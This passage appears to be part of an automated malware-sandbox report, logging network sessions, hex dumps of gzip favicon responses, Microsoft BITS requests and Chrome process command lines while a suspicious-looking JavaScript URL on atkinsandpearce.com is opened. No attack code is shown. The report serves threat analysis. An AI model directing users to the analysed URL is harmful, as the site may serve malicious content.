          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 79 50 95 55 14 ff 48 5b a6 b2 b0 b2 c5 b4 48 cd 61 1a 6b 68 d1 6a aa 99 6c da 26 73 5a a6 71 5a 44 b0 c2 50 51 54 28 97 64 c0 dc 13 77 d3 d2 21 41 40 e1 b1 f3 de e3 b1 ca f2 78 2c 02 0f 78 ec 3b 3c 78 2c ca a6 a4 d5 5f bf ee 39 0f 19 6d b0 c8 66 7a bd ba bf 99 33 df f7 dd 7b cf 3d e7 9e bb cc 99 ef 77 15 c5 41 19 a7 38 3a 2a e2 e9 a4 78 8e 57 94 39 8a a2 38 39 59 bf 9d 27 2a ca 8f a2 cc c5 65 b8 7e a6 a2 e4 4d 52 14 67 d1 c6 91 da 29 d6 f2 6b 01 12 36 45 de c1 05 30 ec 7f ff ba 24 ef d0 02 c4 2e b9 03 ba af 9c 51 15 bf 19 75 49 81 a8 88 f6 43 59 b8 0f ea 53 0f 20 ef c0 07 a8 88 fa 1a c5 c7 3d 51 1e b1 16 a6 c8 75 30 86 7a c3 18 b2 1c e9 9b 9e 43 ac c7 04 d6 57 2d 72 40 d9 29 5f 54 27 6e 83 61 df bb d0 07 ce 43 d6 8e 57 91 2d a4 e0 c8 27 28 09 5e 86 ec 6f df 40 ae a8 23 9b b9 7b df 41 92 ef 0c d6 37 ec 7b 0f fa 3d f3 af 4b 48 57 c2 b6 b8 e6 c1 30 46 38 0f 9f 31 2f cb 73 46 42 42 42 42 62 14 d4 27 ef 43 43 ea 41 9b 49 92 ef a3 88 f3 9c 68 13 d1 fa 4c 87 da 7b 2a 54 [TRUNCATED]
          Data Ascii: ZyPUH[Hakhjl&sZqZDPQT(dw!A@x,x;<x,_9mfz3{=wA8:*xW989Y'*e~MRg)k6E0$.QuICYS =Qu0zCW-r@)_T'naCW-'(^o@#{A7{=KHW0F81/sFBBBBb'CCAIhL{*T>-= OxnH$C.Q}h/"Geo#6NoysDHxv^O9g>-h?T970D/^ ]+rBT'lEOUA!\D>e?L)"W\As9vFC0+qN/#Afc7!N8ukd-_UGY_Zo?I7#*Wejq;Eh(|9Gv4kl"5>~$$
          Jul 15, 2024 18:19:04.220865011 CEST766INData Raw: 24 24 24 6c 84 bf fb 9f c1 de 41 ff 49 5c 84 b8 2b f2 3f 89 84 84 84 84 84 84 84 84 84 84 84 c4 bf 01 17 ba ea 30 d4 dd 60 b7 a2 59 ed 84 e4 75 b3 98 ef b0 27 49 d9 f0 04 fb ae 59 f5 30 e2 97 dd 83 e8 c5 37 d9 95 24 7a dd 8f f8 e5 93 84 ff 0f 59
          Data Ascii: $$$lAI\+?0`Yu'IY07$zY\:'xhZ1$Qp{5.IWrUSY%\FKr2oz1f-6j-QG{t3q\Qk31Vr?64gR
          Jul 15, 2024 18:19:49.232517958 CEST6OUTData Raw: 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449738192.124.249.185804020C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          Jul 15, 2024 18:19:04.263653994 CEST283OUTGET /favicon.ico HTTP/1.1
          Host: atkinsandpearce.com
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Accept-Encoding: gzip, deflate
          Accept-Language: en-US,en;q=0.9
          Jul 15, 2024 18:19:04.794322014 CEST1236INHTTP/1.1 200 OK
          Server: Sucuri/Cloudproxy
          Date: Mon, 15 Jul 2024 16:19:04 GMT
          Content-Type: image/x-icon
          Content-Length: 1418
          Connection: keep-alive
          X-Sucuri-ID: 14035
          X-XSS-Protection: 1; mode=block
          X-Frame-Options: SAMEORIGIN
          X-Content-Type-Options: nosniff
          Vary: Accept-Encoding
          Last-Modified: Tue, 16 Jan 2024 21:17:01 GMT
          ETag: "3c2e-60f16a6b76d40-gzip"
          Cache-Control: max-age=315360000
          Expires: Thu, 31 Dec 2037 23:55:55 GMT
          Content-Encoding: gzip
          Referrer-Policy: no-referrer-when-downgrade
          X-Cache-NxAccel: HIT
          X-Sucuri-Cache: MISS
          Accept-Ranges: bytes
          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 5a 79 50 95 55 14 ff 48 5b a6 b2 b0 b2 c5 b4 48 cd 61 1a 6b 68 d1 6a aa 99 6c da 26 73 5a a6 71 5a 44 b0 c2 50 51 54 28 97 64 c0 dc 13 77 d3 d2 21 41 40 e1 b1 f3 de e3 b1 ca f2 78 2c 02 0f 78 ec 3b 3c 78 2c ca a6 a4 d5 5f bf ee 39 0f 19 6d b0 c8 66 7a bd ba bf 99 33 df f7 dd 7b cf 3d e7 9e bb cc 99 ef 77 15 c5 41 19 a7 38 3a 2a e2 e9 a4 78 8e 57 94 39 8a a2 38 39 59 bf 9d 27 2a ca 8f a2 cc c5 65 b8 7e a6 a2 e4 4d 52 14 67 d1 c6 91 da 29 d6 f2 6b 01 12 36 45 de c1 05 30 ec 7f ff ba 24 ef d0 02 c4 2e b9 03 ba af 9c 51 15 bf 19 75 49 81 a8 88 f6 43 59 b8 0f ea 53 0f 20 ef c0 07 a8 88 fa 1a c5 c7 3d 51 1e b1 16 a6 c8 75 30 86 7a c3 18 b2 1c e9 9b 9e 43 ac c7 04 d6 57 2d 72 40 d9 29 5f 54 27 6e 83 61 df bb d0 07 ce 43 d6 8e 57 91 2d a4 e0 c8 27 28 09 5e 86 ec 6f df 40 ae a8 23 9b b9 7b df 41 92 ef 0c d6 37 ec 7b 0f fa 3d f3 af 4b 48 57 c2 b6 b8 e6 c1 30 46 38 0f 9f 31 2f cb 73 46 42 42 42 42 62 14 d4 27 ef 43 43 ea 41 9b 49 92 ef a3 88 f3 9c 68 13 d1 fa 4c 87 da 7b 2a 54 [TRUNCATED]
          Data Ascii: ZyPUH[Hakhjl&sZqZDPQT(dw!A@x,x;<x,_9mfz3{=wA8:*xW989Y'*e~MRg)k6E0$.QuICYS =Qu0zCW-r@)_T'naCW-'(^o@#{A7{=KHW0F81/sFBBBBb'CCAIhL{*T>-= OxnH$C.Q}h/"Geo#6NoysDHxv^O9g>-h?T970D/^ ]+rBT'lEOUA!\D>e?L)"W\As9vFC0+qN/#Afc7!N8ukd-_UGY_Zo?I7#*Wejq;Eh(|9Gv4kl"5>~$$$
          Jul 15, 2024 18:19:04.794382095 CEST224INData Raw: 24 24 6c 84 bf fb 9f c1 de 41 ff 49 5c 84 b8 2b f2 3f 89 84 84 84 84 84 84 84 84 84 84 84 c4 bf 01 17 ba ea 30 d4 dd 60 b7 a2 59 ed 84 e4 75 b3 98 ef b0 27 49 d9 f0 04 fb ae 59 f5 30 e2 97 dd 83 e8 c5 37 d9 95 24 7a dd 8f f8 e5 93 84 ff 0f 59 ef
          Data Ascii: $$lAI\+?0`Yu'IY07$zY\:'xhZ1$Qp{5.IWrUSY%\FKr2oz1f-6j-QG{t3q\Qk31V
          Jul 15, 2024 18:19:04.932363033 CEST541INData Raw: 72 1d 3f e9 ae d0 c5 de 36 34 67 05 c1 52 92 80 ee ca 34 14 1c fe 98 79 27 e3 89 15 68 33 84 a1 31 fd 30 62 85 5f 55 71 9b 98 cf a1 bb 4b 65 e1 ab d1 65 4a 66 5b 96 52 35 3a 8a e3 d0 96 7f 0a 25 21 5e 68 35 84 b2 4e 9d 6e 37 9a 32 8f a2 3e 79 2f
          Data Ascii: r?64gR4y'h310b_UqKeeJf[R5:%!^h5Nn72>y/s^?:a0t05C2E}6!s\:dW&qwORUE0G&S6Q"C`R92YAQ7{+bxF<N/%Sh/T
          Jul 15, 2024 18:19:49.935328007 CEST6OUTData Raw: 00
          Data Ascii:


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449742184.28.90.27443
          TimestampBytes transferredDirectionData
          2024-07-15 16:19:07 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-07-15 16:19:08 UTC466INHTTP/1.1 200 OK
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF67)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-eus-z1
          Cache-Control: public, max-age=85846
          Date: Mon, 15 Jul 2024 16:19:08 GMT
          Connection: close
          X-CID: 2


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.449743184.28.90.27443
          TimestampBytes transferredDirectionData
          2024-07-15 16:19:08 UTC239OUTGET /fs/windows/config.json HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          Accept-Encoding: identity
          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
          Range: bytes=0-2147483646
          User-Agent: Microsoft BITS/7.8
          Host: fs.microsoft.com
          2024-07-15 16:19:09 UTC514INHTTP/1.1 200 OK
          ApiVersion: Distribute 1.1
          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
          Content-Type: application/octet-stream
          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
          Server: ECAcc (lpl/EF06)
          X-CID: 11
          X-Ms-ApiVersion: Distribute 1.2
          X-Ms-Region: prod-weu-z1
          Cache-Control: public, max-age=85845
          Date: Mon, 15 Jul 2024 16:19:09 GMT
          Content-Length: 55
          Connection: close
          X-CID: 2
          2024-07-15 16:19:09 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


          020406080s020406080100

          Click to jump to process

          020406080s0.0050100MB

          Click to jump to process

          Target ID:0
          Start time:12:18:57
          Start date:15/07/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:2
          Start time:12:19:00
          Start date:15/07/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2256 --field-trial-handle=2164,i,12285018942571206680,11047259333172160187,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:false

          Target ID:3
          Start time:12:19:02
          Start date:15/07/2024
          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://atkinsandpearce.com/assets/js/main-f49476672004c4aclccf.min.js"
          Imagebase:0x7ff76e190000
          File size:3'242'272 bytes
          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:low
          Has exited:true

          No disassembly